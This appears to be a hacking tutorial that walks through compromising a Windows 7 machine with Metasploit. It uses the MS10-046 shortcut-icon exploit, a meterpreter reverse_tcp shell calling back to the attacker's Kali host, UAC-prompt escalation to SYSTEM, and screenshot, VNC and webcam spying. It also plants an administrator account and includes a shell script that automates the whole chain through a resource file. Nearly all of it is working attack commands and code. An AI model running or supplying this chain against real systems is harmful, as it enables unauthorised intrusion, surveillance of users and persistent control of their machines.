HACK WINDOWS USING METASPLOIT FRAMEWORK
Start metasploit first.
# service postgresql start
# msfconsole (to start Metasploit framework)
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
(this module targets MS10-046, the Windows Shell shortcut (.lnk) icon
vulnerability: it serves a shortcut whose icon points at a DLL (dynamic link
library) on a share it hosts, and Explorer loads that DLL just by rendering the
icon. The DLL runs our payload in the background and we get a session on the
Windows 7 machine, known as a Meterpreter session)
msf > set payload windows/meterpreter/reverse_tcp
(reverse_tcp means the victim connects back to Kali on LHOST:LPORT; that TCP
connection is what the Meterpreter session runs over)
msf > set SRVHOST 192.168.81.133 (Kali machine IP, the address the share/URL is served on)
msf > set LHOST 192.168.81.133 (Kali machine IP, the address the payload connects back to)
msf > set LPORT 444
msf > exploit
The console prints what must be opened on the victim (Win7) machine: a UNC path
such as \\192.168.81.133\KJqldvPuyU and an equivalent HTTP URL such as
http://192.168.81.133/yUqFTYBXVO . The random part of the path is different on
every run, so copy the exact string from your own console, not from these notes.
On the victim, open the URL in the browser and CLICK ON ALLOW when prompted.
A separate Explorer window opens showing the shared folder; opening (rendering)
the shortcut file in it triggers the DLL load.
Now go back to the Kali machine. Press enter to get the msf prompt and type
msf > sessions -i 1
meterpreter > getsystem (tries to get SYSTEM privilege, i.e. full control)
(this fails here: the session runs as the logged-on user at medium integrity
because UAC (User Account Control) has not been bypassed, and getsystem needs an
elevated token to start from)
priv_elevate_getsystem: Operation failed: The environment is incorrect
You will see that the Meterpreter session itself is fine; what you still need is
an administrator-level token on the victim PC. To escalate to it, use the
following commands.
meterpreter > background (keeps session 1 running in the background and returns to the msf prompt)
msf > use exploit/windows/local/ask
(this module makes Windows open a UAC dialog box on the victim; if the user
clicks Yes we get an elevated session, i.e. full control. It only works if the
user accepts the prompt. Set LHOST and LPORT for this module as well if you do
not want its defaults; its handler port must differ from 444, which the browser
exploit job is still listening on)
msf exploit(windows/local/ask) > set SESSION 1
msf exploit(windows/local/ask) > exploit
The user on Win7 is now prompted by UAC; click Yes on the victim Win7 PC. After
that, on Kali, another
Meterpreter session 2 is started with an elevated (administrator) token.
msf exploit(windows/local/ask) > sessions -i 2
meterpreter > getsystem
Now it should succeed; getuid afterwards shows NT AUTHORITY\SYSTEM.
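The steps above (serve the MS10-046 shortcut, wait for session 1, run windows/local/ask against it, wait for the elevated session 2, check it) can be driven from a Metasploit resource file instead of typing them one by one. The script below is an added example, not part of the original notes: it writes such a resource file (with a <ruby> block that waits for the sessions) and optionally starts msfconsole with it. It assumes the LHOST and the two handler ports are passed in as parameters, that print_status, run_single and framework are available inside the <ruby> block as in stock msfconsole, and that the installed version supports sessions -C; the IP and ports in the run branch are the lab values from these notes.

```shell
#!/bin/sh
# Generate (and optionally run) a Metasploit resource file for the
# MS10-046 -> windows/local/ask -> getsystem chain. Added example;
# all values are parameters, nothing is copied from a real session.

# write_rc LHOST BROWSER_LPORT ASK_LPORT OUTFILE
# The ask stage needs its own LPORT because the browser-exploit job
# keeps the first handler port bound (assumption: stock msf behaviour).
write_rc() {
  lhost="$1"; bport="$2"; aport="$3"; out="$4"
  cat > "$out" <<EOF
# --- stage 1: serve the MS10-046 shortcut/DLL and catch the first session ---
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST $lhost
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $bport
exploit -j
<ruby>
print_status("Waiting for the victim to open the served share/URL ...")
sleep(1) until framework.sessions.length >= 1
sid = framework.sessions.keys.min
print_good("Got session #{sid}; asking the user to approve a UAC prompt")
# stage 2: windows/local/ask against the medium-integrity session
# (run_single/framework inside <ruby> are assumed from stock msfconsole)
run_single("use exploit/windows/local/ask")
run_single("set SESSION #{sid}")
run_single("set payload windows/meterpreter/reverse_tcp")
run_single("set LHOST $lhost")
run_single("set LPORT $aport")
run_single("exploit -j")
sleep(1) until framework.sessions.length >= 2
sid2 = framework.sessions.keys.max
print_good("Elevated session #{sid2} arrived; checking it")
run_single("sessions -C getuid -i #{sid2}")
run_single("sessions -C getsystem -i #{sid2}")
</ruby>
EOF
}

# rc_line_count OUTFILE -> number of command lines (comments excluded)
rc_line_count() { grep -vc '^#' "$1"; }

# usage: sh chain.sh run   (lab values from these notes)
if [ "${1:-}" = "run" ]; then
  rc=$(mktemp)
  write_rc 192.168.81.133 444 4445 "$rc"
  msfconsole -q -r "$rc"
fi
```

The resource file still depends on the victim actually opening the share and clicking Yes in the UAC dialog; the <ruby> block only waits for the resulting sessions, it cannot force them.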
First have a look at what is on the victim PC.
meterpreter > screenshot (takes a screenshot of the victim's desktop)
meterpreter > run vnc (view the victim's desktop live; the viewer is
view-only by default)
meterpreter > run webcam (only if the victim PC has a webcam and its driver
is installed)
Add a user on the remote PC and make it a member of the local Administrators
group
Method 1
Apart from these default commands, Meterpreter can be strengthened further
with extensions. To load an extension, type "use" (or "load" in newer
versions) followed by the name of the extension.
meterpreter > use incognito
(this loads the incognito extension, which adds add_user, add_localgroup_user
and the token commands; they act with the session's current token, so run
them in the elevated session 2)
meterpreter > add_user mark 123
meterpreter > add_localgroup_user administrators mark
(the order is group name first, then user name)
If you have dropped into a Windows command prompt (meterpreter > shell), type
exit at the C:\ prompt to go back to Meterpreter:
C:\Windows\system32> exit